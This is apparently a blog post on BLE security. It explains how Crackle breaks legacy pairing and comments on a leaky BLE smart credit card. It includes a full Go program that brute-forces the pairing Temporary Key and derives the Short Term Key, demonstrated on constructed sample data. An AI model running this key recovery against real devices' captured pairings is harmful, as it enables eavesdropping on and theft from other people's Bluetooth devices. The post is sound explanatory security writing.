I often find myself wondering “what could possibly go wrong?” sarcastically when I read about hotel doors that can be unlocked via BLE with an app, and all other sorts of products with BLE connectivity. Being familiar and hands-on with the well-known security issues of BLE is actually sometimes very useful. I once got a huge discount on an Airbnb stay after I demoed a hack on the host’s cute Catskills house’s smart lock, an August smart lock, and helped the host update the app and firmware. All credit to Jmaxxz for the excellent work presented at DEF CON, which I simply partially reproduced.

In general, I always tell folks that it is never a good idea to use BLE for connectivity if you are building a product with high security requirements. That’s why, the moment I read about a smart credit card that uses BLE, my first thought was – yes, you guessed it – “what could possibly go wrong?”. And Mike Ryan made my day with a blog post explaining precisely what could go wrong and, indeed, what did go wrong.

Mike Ryan is possibly the best-known Bluetooth security researcher out there. He is the author of one of my favorite tools, Crackle, which brute-forces the Temporary Key of BLE legacy pairing (TK = 0 for Just Works, a six-digit number for Passkey Entry, so at most a million candidates) from a sniffed pairing exchange, derives the STK from it, and from there recovers the LTK and decrypts the session. It does not work if the pairing was fully out of band with a 128-bit key (or used LE Secure Connections, which Crackle does not break). Out-of-band pairing is something that, by the way, I only know one consumer electronics device doing: the Apple Watch. In defense of all other consumer electronics, the last time I did iOS development, the APIs for out-of-band pairing were not exposed.
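To make concrete why Crackle is a brute force and not a cryptographic break, here is an added example, written for this post and not taken from Crackle or from Mike Ryan’s code. It implements the legacy-pairing confirm function c1 and key function s1 as laid out in Bluetooth Core Spec Vol 3, Part H (values as 16-byte arrays, most significant byte first, following the spec’s notation), then recovers the TK and STK from a constructed pairing exchange. The pairing PDUs, addresses and random values below are sample data built inside the program, not a real capture; readers who want to validate the byte layout can compare c1 against the test vector in that section of the spec.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// All 128-bit values are 16-byte slices, most significant byte first, as in the
// spec's notation. The 7-octet pairing PDUs follow the same convention, so the
// PDU opcode ends up as the least significant octet.

// PairingCapture holds what a passive sniffer sees during LE legacy pairing.
// Nothing here is secret; only the TK is, and it has at most 10^6 values.
type PairingCapture struct {
	Preq, Pres      []byte // 7-octet Pairing Request / Pairing Response
	Iat, Rat        byte   // initiator / responder address type (0 public, 1 random)
	Ia, Ra          []byte // initiator / responder device address, 6 octets
	Mrand, Mconfirm []byte // sent by the initiator (master)
	Srand           []byte // sent by the responder (slave)
}

// e is the spec's AES-128 block encryption primitive e(key, plaintext).
func e(key, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, 16)
	block.Encrypt(out, plaintext)
	return out
}

func xor16(a, b []byte) []byte {
	out := make([]byte, 16)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// c1 is the confirm value function: e(k, e(k, r XOR p1) XOR p2) with
// p1 = pres || preq || rat' || iat' and p2 = padding || ia || ra.
func c1(k, r []byte, pc PairingCapture) []byte {
	p1 := append(append(append([]byte{}, pc.Pres...), pc.Preq...), pc.Rat, pc.Iat)
	p2 := append(append([]byte{0, 0, 0, 0}, pc.Ia...), pc.Ra...)
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 is the key generation function: e(k, r1' || r2'), where r1' and r2' are
// the 64 least significant bits of r1 and r2. STK = s1(TK, Srand, Mrand).
func s1(k, r1, r2 []byte) []byte {
	return e(k, append(append([]byte{}, r1[8:]...), r2[8:]...))
}

// tkFromPasskey builds the Passkey Entry TK: the six-digit passkey as a 128-bit
// integer. Just Works uses TK = 0, i.e. passkey 0.
func tkFromPasskey(passkey uint32) []byte {
	tk := make([]byte, 16)
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// CrackTK tries every candidate TK against the sniffed Mconfirm, which is what
// Crackle does. Returns the passkey, or -1 when no candidate matches (a 128-bit
// OOB key, or a pairing that was not legacy pairing at all).
func CrackTK(pc PairingCapture) int {
	for passkey := uint32(0); passkey <= 999999; passkey++ {
		if bytes.Equal(c1(tkFromPasskey(passkey), pc.Mrand, pc), pc.Mconfirm) {
			return int(passkey)
		}
	}
	return -1
}

// RecoverSTK derives the Short Term Key that encrypts the link right after
// pairing; the LTK is distributed over that link, so the STK unlocks every later session.
func RecoverSTK(pc PairingCapture) ([]byte, bool) {
	passkey := CrackTK(pc)
	if passkey < 0 {
		return nil, false
	}
	return s1(tkFromPasskey(uint32(passkey)), pc.Srand, pc.Mrand), true
}

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// ConstructedCapture fabricates the exchange a sniffer would have seen for a
// victim whose TK came from the given passkey. Constructed sample data, not a
// real capture: Mconfirm is computed here exactly as the initiator computes it.
func ConstructedCapture(passkey uint32) PairingCapture {
	pc := PairingCapture{
		Preq: mustHex("07071000000101"), Pres: mustHex("05000800000302"),
		Iat: 1, Rat: 0,
		Ia: mustHex("a1a2a3a4a5a6"), Ra: mustHex("b1b2b3b4b5b6"),
		Mrand: mustHex("5783d52156ad6f0e6388274ec6702ee0"),
		Srand: mustHex("a6e8e7cc25a75f6e216583f7ff3dc4cf"),
	}
	pc.Mconfirm = c1(tkFromPasskey(passkey), pc.Mrand, pc)
	return pc
}

func main() {
	pc := ConstructedCapture(234567)
	if stk, ok := RecoverSTK(pc); ok {
		fmt.Printf("passkey %06d recovered from Mconfirm %x, STK %x\n", CrackTK(pc), pc.Mconfirm, stk)
	}
	fmt.Println("Just Works passkey:", CrackTK(ConstructedCapture(0)))
}
```

The loop is the whole attack: the confirm value binds the TK to public values only, so anyone who recorded the exchange can test all 10^6 TKs offline, and Just Works needs no search at all. Swapping in a full 128-bit OOB key (or LE Secure Connections, whose key agreement is ECDH) takes the search out of reach, which is exactly the case Crackle cannot handle.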

Interestingly, although some of the attacks against this smart card would also be possible by sniffing the pairing exchange and brute-forcing the key, none of that is needed here: the issue is simply a total lack of authentication and protection of the messages exchanged with the device. If an adversary got their hands on one of these devices, it is arguably very easy to pull in plaintext the card numbers, expiration dates and CVC codes of all cards stored in the device. One does not even need to run Crackle, just the standard Linux Bluetooth tools (bluetoothctl and gatttool) to connect and read the GATT characteristics.

Very interesting read indeed. And yet again, another example of why it is never a good idea to use BLE for connectivity in consumer electronics with high security requirements.
